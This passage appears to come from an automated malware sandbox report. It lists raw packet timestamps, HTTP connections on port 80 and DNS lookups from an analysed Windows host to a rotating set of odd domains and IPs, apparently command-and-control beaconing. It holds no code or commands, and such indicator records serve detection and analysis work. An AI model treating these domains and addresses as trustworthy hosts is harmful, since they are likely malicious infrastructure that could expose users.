                                          Jul 4, 2024 16:54:48.849965096 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:48.850044966 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:48.852255106 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:48.857043028 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.483876944 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.483983994 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.483998060 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.484040022 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:49.484078884 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.484092951 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.484103918 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.484116077 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.484117031 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:49.484122992 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.484142065 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:49.484165907 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:49.484318972 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.484354019 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.484399080 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:49.488981962 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.489037991 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.489048004 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.489111900 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:49.489183903 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.489232063 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:49.577954054 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.577999115 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.578011990 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.578047037 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:49.578083992 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:50.356796980 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:51.418939114 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:51.423858881 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:51.423943043 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:51.426166058 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:51.431107044 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:51.431135893 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.051856041 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.051881075 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.051893950 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.051975012 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:52.051987886 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.052002907 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.052015066 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.052026987 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.052040100 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.052041054 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:52.052053928 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.052103043 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:52.052103043 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:52.052370071 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.052510023 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:52.057169914 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.057233095 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.057245016 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.057307005 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.057313919 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:52.057357073 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:52.145328045 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.145410061 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.145422935 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.145510912 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:52.934694052 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:53.959249973 CEST4973180192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:53.966015100 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:53.966521978 CEST4973180192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:53.975816965 CEST4973180192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:53.982036114 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.582721949 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.582777023 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.582789898 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.582945108 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.582957029 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.582967997 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.582973957 CEST4973180192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:54.583002090 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.583014965 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.583026886 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.583029985 CEST4973180192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:54.583074093 CEST4973180192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:54.583153009 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.583280087 CEST4973180192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:54.588082075 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.588131905 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.588144064 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.588301897 CEST4973180192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:54.588433981 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.588531017 CEST4973180192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:54.672668934 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.672689915 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.672738075 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.672853947 CEST4973180192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:54.676493883 CEST4973180192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:54.681242943 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:59.771852970 CEST4973280192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:54:59.776686907 CEST8049732213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:54:59.777580023 CEST4973280192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:54:59.779588938 CEST4973280192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:54:59.784466028 CEST8049732213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:00.535612106 CEST8049732213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:00.535774946 CEST8049732213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:00.535789967 CEST8049732213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:00.535912991 CEST4973280192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:55:00.539392948 CEST8049732213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:00.539407015 CEST8049732213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:00.539567947 CEST4973280192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:55:01.294305086 CEST4973280192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:55:02.315598011 CEST4973380192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:55:02.322861910 CEST8049733213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:02.323611021 CEST4973380192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:55:02.327495098 CEST4973380192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:55:02.332343102 CEST8049733213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:03.049491882 CEST8049733213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:03.049530029 CEST8049733213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:03.049541950 CEST8049733213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:03.049570084 CEST4973380192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:55:03.052833080 CEST8049733213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:03.052846909 CEST8049733213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:03.052887917 CEST4973380192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:55:03.843497992 CEST4973380192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:55:04.859703064 CEST4973480192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:55:04.864695072 CEST8049734213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:04.864799976 CEST4973480192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:55:04.866548061 CEST4973480192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:55:04.871385098 CEST8049734213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:04.871467113 CEST8049734213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:05.599817038 CEST8049734213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:05.599869013 CEST8049734213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:05.599883080 CEST8049734213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:05.599931955 CEST4973480192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:55:05.603004932 CEST8049734213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:05.603049994 CEST4973480192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:55:05.603075027 CEST8049734213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:05.603116035 CEST4973480192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:55:06.372232914 CEST4973480192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:55:07.392016888 CEST4973580192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:55:07.397516012 CEST8049735213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:07.397586107 CEST4973580192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:55:07.399606943 CEST4973580192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:55:07.404699087 CEST8049735213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:08.144592047 CEST8049735213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:08.144619942 CEST8049735213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:08.144633055 CEST8049735213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:08.144773960 CEST4973580192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:55:08.148912907 CEST8049735213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:08.149050951 CEST8049735213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:08.149059057 CEST4973580192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:55:08.149202108 CEST4973580192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:55:08.151941061 CEST4973580192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:55:08.156794071 CEST8049735213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:55:13.224864006 CEST4973680192.168.2.791.195.240.19
                                          Jul 4, 2024 16:55:13.229713917 CEST804973691.195.240.19192.168.2.7
                                          Jul 4, 2024 16:55:13.229856014 CEST4973680192.168.2.791.195.240.19
                                          Jul 4, 2024 16:55:13.231476068 CEST4973680192.168.2.791.195.240.19
                                          Jul 4, 2024 16:55:13.236260891 CEST804973691.195.240.19192.168.2.7
                                          Jul 4, 2024 16:55:13.875991106 CEST804973691.195.240.19192.168.2.7
                                          Jul 4, 2024 16:55:13.876015902 CEST804973691.195.240.19192.168.2.7
                                          Jul 4, 2024 16:55:13.876077890 CEST4973680192.168.2.791.195.240.19
                                          Jul 4, 2024 16:55:14.747235060 CEST4973680192.168.2.791.195.240.19
                                          Jul 4, 2024 16:55:15.766587973 CEST4973780192.168.2.791.195.240.19
                                          Jul 4, 2024 16:55:15.771569014 CEST804973791.195.240.19192.168.2.7
                                          Jul 4, 2024 16:55:15.773602962 CEST4973780192.168.2.791.195.240.19
                                          Jul 4, 2024 16:55:15.777513981 CEST4973780192.168.2.791.195.240.19
                                          Jul 4, 2024 16:55:15.782330036 CEST804973791.195.240.19192.168.2.7
                                          Jul 4, 2024 16:55:16.422389030 CEST804973791.195.240.19192.168.2.7
                                          Jul 4, 2024 16:55:16.422887087 CEST804973791.195.240.19192.168.2.7
                                          Jul 4, 2024 16:55:16.424622059 CEST4973780192.168.2.791.195.240.19
                                          Jul 4, 2024 16:55:17.278846979 CEST4973780192.168.2.791.195.240.19
                                          Jul 4, 2024 16:55:18.297332048 CEST4973880192.168.2.791.195.240.19
                                          Jul 4, 2024 16:55:18.302452087 CEST804973891.195.240.19192.168.2.7
                                          Jul 4, 2024 16:55:18.303673029 CEST4973880192.168.2.791.195.240.19
                                          Jul 4, 2024 16:55:18.307742119 CEST4973880192.168.2.791.195.240.19
                                          Jul 4, 2024 16:55:18.312644958 CEST804973891.195.240.19192.168.2.7
                                          Jul 4, 2024 16:55:18.312714100 CEST804973891.195.240.19192.168.2.7
                                          Jul 4, 2024 16:55:19.813520908 CEST4973880192.168.2.791.195.240.19
                                          Jul 4, 2024 16:55:19.819004059 CEST804973891.195.240.19192.168.2.7
                                          Jul 4, 2024 16:55:19.821696997 CEST4973880192.168.2.791.195.240.19
                                          Jul 4, 2024 16:55:20.829240084 CEST4973980192.168.2.791.195.240.19
                                          Jul 4, 2024 16:55:20.834342003 CEST804973991.195.240.19192.168.2.7
                                          Jul 4, 2024 16:55:20.834412098 CEST4973980192.168.2.791.195.240.19
                                          Jul 4, 2024 16:55:20.836631060 CEST4973980192.168.2.791.195.240.19
                                          Jul 4, 2024 16:55:20.841510057 CEST804973991.195.240.19192.168.2.7
                                          Jul 4, 2024 16:55:21.492542982 CEST804973991.195.240.19192.168.2.7
                                          Jul 4, 2024 16:55:21.492563963 CEST804973991.195.240.19192.168.2.7
                                          Jul 4, 2024 16:55:21.492691040 CEST4973980192.168.2.791.195.240.19
                                          Jul 4, 2024 16:55:21.496992111 CEST4973980192.168.2.791.195.240.19
                                          Jul 4, 2024 16:55:21.502803087 CEST804973991.195.240.19192.168.2.7
                                          Jul 4, 2024 16:55:26.611922026 CEST4974080192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:26.616835117 CEST8049740194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:26.617682934 CEST4974080192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:26.621589899 CEST4974080192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:26.626445055 CEST8049740194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:27.350744009 CEST8049740194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:27.350768089 CEST8049740194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:27.350781918 CEST8049740194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:27.350795031 CEST8049740194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:27.350802898 CEST8049740194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:27.350815058 CEST4974080192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:27.350891113 CEST4974080192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:28.125566006 CEST4974080192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:29.142093897 CEST4974180192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:29.147480965 CEST8049741194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:29.147567987 CEST4974180192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:29.149800062 CEST4974180192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:29.154563904 CEST8049741194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:29.859321117 CEST8049741194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:29.859339952 CEST8049741194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:29.859352112 CEST8049741194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:29.859416962 CEST8049741194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:29.859427929 CEST8049741194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:29.859463930 CEST4974180192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:29.865545988 CEST4974180192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:30.657550097 CEST4974180192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:31.672760963 CEST4974280192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:31.678965092 CEST8049742194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:31.679043055 CEST4974280192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:31.681422949 CEST4974280192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:31.686474085 CEST8049742194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:31.686491013 CEST8049742194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:32.382322073 CEST8049742194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:32.382335901 CEST8049742194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:32.382419109 CEST8049742194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:32.382431030 CEST8049742194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:32.382482052 CEST4974280192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:32.382575989 CEST8049742194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:32.382587910 CEST4974280192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:32.382633924 CEST4974280192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:33.184828997 CEST4974280192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:34.203428984 CEST4974380192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:34.208384037 CEST8049743194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:34.211463928 CEST4974380192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:34.215828896 CEST4974380192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:34.220591068 CEST8049743194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:34.945995092 CEST8049743194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:34.946018934 CEST8049743194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:34.946033001 CEST8049743194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:34.946044922 CEST8049743194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:34.946084976 CEST8049743194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:34.946098089 CEST8049743194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:34.946110010 CEST8049743194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:34.946122885 CEST8049743194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:34.946146011 CEST8049743194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:34.946162939 CEST4974380192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:34.946223974 CEST4974380192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:34.946358919 CEST8049743194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:34.946434021 CEST4974380192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:34.951987028 CEST4974380192.168.2.7194.58.112.174
                                          Jul 4, 2024 16:55:34.956798077 CEST8049743194.58.112.174192.168.2.7
                                          Jul 4, 2024 16:55:40.017489910 CEST4974480192.168.2.7172.67.210.102
                                          Jul 4, 2024 16:55:40.022397041 CEST8049744172.67.210.102192.168.2.7
                                          Jul 4, 2024 16:55:40.024698973 CEST4974480192.168.2.7172.67.210.102
                                          Jul 4, 2024 16:55:40.027987003 CEST4974480192.168.2.7172.67.210.102
                                          Jul 4, 2024 16:55:40.033010006 CEST8049744172.67.210.102192.168.2.7
                                          Jul 4, 2024 16:55:41.528598070 CEST4974480192.168.2.7172.67.210.102
                                          Jul 4, 2024 16:55:41.533912897 CEST8049744172.67.210.102192.168.2.7
                                          Jul 4, 2024 16:55:41.533992052 CEST4974480192.168.2.7172.67.210.102
                                          Jul 4, 2024 16:55:42.547219038 CEST4974580192.168.2.7172.67.210.102
                                          Jul 4, 2024 16:55:42.552747965 CEST8049745172.67.210.102192.168.2.7
                                          Jul 4, 2024 16:55:42.553698063 CEST4974580192.168.2.7172.67.210.102
                                          Jul 4, 2024 16:55:42.557594061 CEST4974580192.168.2.7172.67.210.102
                                          Jul 4, 2024 16:55:42.569637060 CEST8049745172.67.210.102192.168.2.7
                                          Jul 4, 2024 16:55:44.061575890 CEST4974580192.168.2.7172.67.210.102
                                          Jul 4, 2024 16:55:44.067070007 CEST8049745172.67.210.102192.168.2.7
                                          Jul 4, 2024 16:55:44.069667101 CEST4974580192.168.2.7172.67.210.102
                                          Jul 4, 2024 16:55:45.079693079 CEST4974680192.168.2.7172.67.210.102
                                          Jul 4, 2024 16:55:45.084634066 CEST8049746172.67.210.102192.168.2.7
                                          Jul 4, 2024 16:55:45.084717035 CEST4974680192.168.2.7172.67.210.102
                                          Jul 4, 2024 16:55:45.087105036 CEST4974680192.168.2.7172.67.210.102
                                          Jul 4, 2024 16:55:45.092492104 CEST8049746172.67.210.102192.168.2.7
                                          Jul 4, 2024 16:55:45.092508078 CEST8049746172.67.210.102192.168.2.7
                                          Jul 4, 2024 16:55:46.591160059 CEST4974680192.168.2.7172.67.210.102
                                          Jul 4, 2024 16:55:46.596646070 CEST8049746172.67.210.102192.168.2.7
                                          Jul 4, 2024 16:55:46.597656965 CEST4974680192.168.2.7172.67.210.102
                                          Jul 4, 2024 16:55:47.610555887 CEST4974780192.168.2.7172.67.210.102
                                          Jul 4, 2024 16:55:47.615489960 CEST8049747172.67.210.102192.168.2.7
                                          Jul 4, 2024 16:55:47.615603924 CEST4974780192.168.2.7172.67.210.102
                                          Jul 4, 2024 16:55:47.617620945 CEST4974780192.168.2.7172.67.210.102
                                          Jul 4, 2024 16:55:47.625909090 CEST8049747172.67.210.102192.168.2.7

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jul 4, 2024 16:52:36.241081953 CEST5850153192.168.2.71.1.1.1
                                          Jul 4, 2024 16:52:36.456454992 CEST53585011.1.1.1192.168.2.7
                                          Jul 4, 2024 16:52:52.203234911 CEST5734453192.168.2.71.1.1.1
                                          Jul 4, 2024 16:52:52.242819071 CEST53573441.1.1.1192.168.2.7
                                          Jul 4, 2024 16:53:05.556727886 CEST5943553192.168.2.71.1.1.1
                                          Jul 4, 2024 16:53:05.566529989 CEST53594351.1.1.1192.168.2.7
                                          Jul 4, 2024 16:53:13.663983107 CEST5864653192.168.2.71.1.1.1
                                          Jul 4, 2024 16:53:13.680458069 CEST53586461.1.1.1192.168.2.7
                                          Jul 4, 2024 16:53:21.751537085 CEST5763553192.168.2.71.1.1.1
                                          Jul 4, 2024 16:53:22.011007071 CEST53576351.1.1.1192.168.2.7
                                          Jul 4, 2024 16:53:35.664335966 CEST6239353192.168.2.71.1.1.1
                                          Jul 4, 2024 16:53:35.700967073 CEST53623931.1.1.1192.168.2.7
                                          Jul 4, 2024 16:53:43.767363071 CEST6388353192.168.2.71.1.1.1
                                          Jul 4, 2024 16:53:44.351984978 CEST53638831.1.1.1192.168.2.7
                                          Jul 4, 2024 16:53:58.015775919 CEST5872253192.168.2.71.1.1.1
                                          Jul 4, 2024 16:53:58.134581089 CEST53587221.1.1.1192.168.2.7
                                          Jul 4, 2024 16:54:11.454082966 CEST4981853192.168.2.71.1.1.1
                                          Jul 4, 2024 16:54:12.048006058 CEST53498181.1.1.1192.168.2.7
                                          Jul 4, 2024 16:54:46.266593933 CEST5614553192.168.2.71.1.1.1
                                          Jul 4, 2024 16:54:46.300498962 CEST53561451.1.1.1192.168.2.7
                                          Jul 4, 2024 16:54:59.688368082 CEST5219653192.168.2.71.1.1.1
                                          Jul 4, 2024 16:54:59.769205093 CEST53521961.1.1.1192.168.2.7
                                          Jul 4, 2024 16:55:13.167337894 CEST6222853192.168.2.71.1.1.1
                                          Jul 4, 2024 16:55:13.222177029 CEST53622281.1.1.1192.168.2.7
                                          Jul 4, 2024 16:55:26.501554966 CEST5164953192.168.2.71.1.1.1
                                          Jul 4, 2024 16:55:26.608942986 CEST53516491.1.1.1192.168.2.7
                                          Jul 4, 2024 16:55:39.993566990 CEST5849953192.168.2.71.1.1.1
                                          Jul 4, 2024 16:55:40.008565903 CEST53584991.1.1.1192.168.2.7

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Jul 4, 2024 16:52:36.241081953 CEST192.168.2.71.1.1.10x32ebStandard query (0)www.hprlz.czA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:52:52.203234911 CEST192.168.2.71.1.1.10x3ccfStandard query (0)www.catherineviskadi.comA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:53:05.556727886 CEST192.168.2.71.1.1.10xf0d0Standard query (0)www.hatercoin.onlineA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:53:13.663983107 CEST192.168.2.71.1.1.10x37e4Standard query (0)www.fourgrouw.cfdA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:53:21.751537085 CEST192.168.2.71.1.1.10x1731Standard query (0)www.bfiworkerscomp.comA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:53:35.664335966 CEST192.168.2.71.1.1.10xa43bStandard query (0)www.tinmapco.comA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:53:43.767363071 CEST192.168.2.71.1.1.10x795cStandard query (0)www.xn--fhq1c541j0zr.comA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:53:58.015775919 CEST192.168.2.71.1.1.10xad1dStandard query (0)www.xn--matfrmn-jxa4m.seA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:54:11.454082966 CEST192.168.2.71.1.1.10x1736Standard query (0)www.anuts.topA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:54:46.266593933 CEST192.168.2.71.1.1.10x6294Standard query (0)www.telwisey.infoA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:54:59.688368082 CEST192.168.2.71.1.1.10x4fc2Standard query (0)www.sandranoll.comA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:55:13.167337894 CEST192.168.2.71.1.1.10x185cStandard query (0)www.gipsytroya.comA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:55:26.501554966 CEST192.168.2.71.1.1.10x5c85Standard query (0)www.helpers-lion.onlineA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:55:39.993566990 CEST192.168.2.71.1.1.10xa5dcStandard query (0)www.dmtxwuatbz.ccA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Jul 4, 2024 16:52:36.456454992 CEST1.1.1.1192.168.2.70x32ebNo error (0)www.hprlz.cz5.44.111.162A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:52:52.242819071 CEST1.1.1.1192.168.2.70x3ccfNo error (0)www.catherineviskadi.com217.160.0.106A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:53:05.566529989 CEST1.1.1.1192.168.2.70xf0d0Name error (3)www.hatercoin.onlinenonenoneA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:53:13.680458069 CEST1.1.1.1192.168.2.70x37e4Name error (3)www.fourgrouw.cfdnonenoneA (IP address)IN (0x0001)false
